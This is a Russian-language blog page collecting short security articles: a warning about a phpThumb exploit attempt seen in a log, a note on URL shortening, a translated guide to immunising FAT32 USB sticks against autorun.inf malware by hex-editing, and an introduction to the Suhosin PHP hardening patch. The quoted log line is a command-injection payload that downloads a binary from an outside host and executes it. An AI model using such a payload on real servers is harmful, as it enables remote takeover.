Статьи

Недавно, на почту свалился вот такой вот отчет:

/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9

Хорошо, что у меня этого плагина (ibrowser) нет. Так что будьте бдительны.

Доброго времени суток!

Часть 1 — общие сведения об TinyUrl

Наверно, каждый из пользователей всемирной паутины сталкивался с проблемой отправки/передачи ссылки на какой то материал в сети. Ссылки такого вида: http://gibs0n.name/article/Предотвращение+распространения+USB+вирусов Чтоже тут плохого?

На первый взгляд ничего, но многие сервисы использующие автоматическую типографию (преобразование текста в гипертекст) могут попросту «откусить» часть ссылки и переходе по ней пользователь попросту не увидит желаемый материал. Не думаю, что пользователь будет искать причину ошибки и попросту уйдет с ресурса.

Перевод статьи с английского, автор Robin Bailey 05/04/2009
Оригинал на английском

Введение

Поскольку использование флешки становится все более и более широко и вредоносные программы начали использовать их в качестве средства распространения с машины на машину. Хотя это проблема самих пользователей, но представляет большую опасность для IT специалистов, которые могут использовать тот же USB Stick в десятки компьютеров в течение одного дня и часто входят с административными привилегиями, тем самым давая достук важной информации и распространению вирусов. Эта статья предназначена для IT специалистов (и не только для них), и как они могут снизить риск передачи инфекции на другие машины.

Описание проблемы

Вредоносная программа использует два основных метода для распространения через карты памяти. Во-первых, и менее серьезные, заражает исполняемые файлы на карту памяти, так что когда они работают на другую машину, инфекция перемещается вместе с ними. Более распространенным, и более опасным, является распространение через autorun.inf, которые Windows автоматически выполняет при подключении диска (шлешки), это означает, что не требуется взаимодействие с пользователем. Conficker было получить много внимания недавно, и это было одним из методов, используются для распространения себя, но многие другие вредоносные программы использовали ту же технику. Можно отключить функцию автозапуска из windows, но не всегда есть возможность отключить автоматическое выполнение.

Решение

Поскольку мы не можем полагаться на компьютер, чтобы предотвратить выполение файл autorun.inf, мы должны делать это с флешкой. Можно купить флешку с переключателем в режим только чтения. Дать компьютер для них, но это может вызвать проблемы, легко забыть, и не помогает после того как флешка была инфицирована.

Однако, если на флешке ФС FAT32, которая стоит на большинстве которых, за исключением некоторых из новых флешек на 8GB + диски, но мы можем создать быстро исправить используя шестнадцатиричный редактор, и базовые знания FAT32 таблице каталога.

Во-первых, мы создаем пустой autorun.inf файл на карту памяти, затем открываем диск в шестнадцатеричном редакторе. Неважно, если вы откроете физического диска или логический раздел, но если на диске более одного раздела, то лучше сделать его последним. Убедитесь, что диск открыт для чтения / записи разрешения, и что ничего не блокирует доступ к ней на тот момент. HxD Для Windows это небольшое, портативное шестнадцатеричном редакторе, если у вас ее еще нет.

Хотя это можно сделать с дисками с данными, но это безопаснее сделать на пустом насителе на всякий случай. Если нет, то убедитесь, что у вас есть копия информации или сделайте резервное копирование, только Вы несете ответсвенность за потерю информации с носителя.

Затем выполните поиск на диске для струнного AUTORUN, не как Unicode текста. Она должна найти его ближе к началу диска. Области мы заинтересованы в том, как следует.

41 55 54 4F 52 55 4E 20 49 4E 46 20 A U T O R U N I N F

Первые 8 байт файла (с пробелом в конце, потому что автозапуск только 7 символов), за которыми следуют 3 байта расширение файла (РСМД), за которыми следуют один байт на атрибуты файла. Именно это окончательное байт, который является искомым.

Текущее значение байт (0x20) только в архив битом. Что мы хотим сделать, это изменить этот байт на 0x40, который устанавливает бит устройства. Блок теперь будет выглядеть следующим образом.

41 55 54 4F 52 55 4E 20 49 4E 46 40 A U T O R U N I N F @

После этого был сохранен на диске, игнорируя все предупреждения, что это может повредить диске, мы тогда монтирования и размонтирования тома. Теперь при просмотре диске файл autorun.inf, можно видеть, но он не может быть удален, открыт, не редактируются, не перезаписаны, или его атрибуты изменены.

Когда флешка используется на заражонном компьютере, она не может заразиться, потому что при копировании файл autorun.inf будет ошибка.

milw0rm.com [2009-04-06]

Уязвимости в различных CMS, форума etc отходят и найти банальную SQL-injection, RFI, LFI или XSS довольно таки сложно, а если обновления выходят незамедлительно, практически сводятся к нулю. В таком случае необходимо искать баги уже в программном обеспечении. Иногда при удачной эксплуатации баги в интерпретаторе бывает достаточно чтобы провести vendor:)

Проект Suhosin

Простой защиты с помощью php иногда бывает недостаточно и тут на помощь приходит патч к PHP, который предназначен для более надежной защиты скриптов.

Suhosin представляет собой систему защиты PHP скриптов. Он был разработан для защиты серверов и пользователей от известных и неизвестных недостатков PHP приложений.
Suhosin поставляется в двух независимых частей, которые могут быть использованы отдельно или в комбинации. Первая часть может быть использованна как дополнение к ядру PHP для защиты от bufferoverflows или «уязвимость строки форматирования», а вторая часть является мощным расширением PHP, которая реализует все другие формы защиты.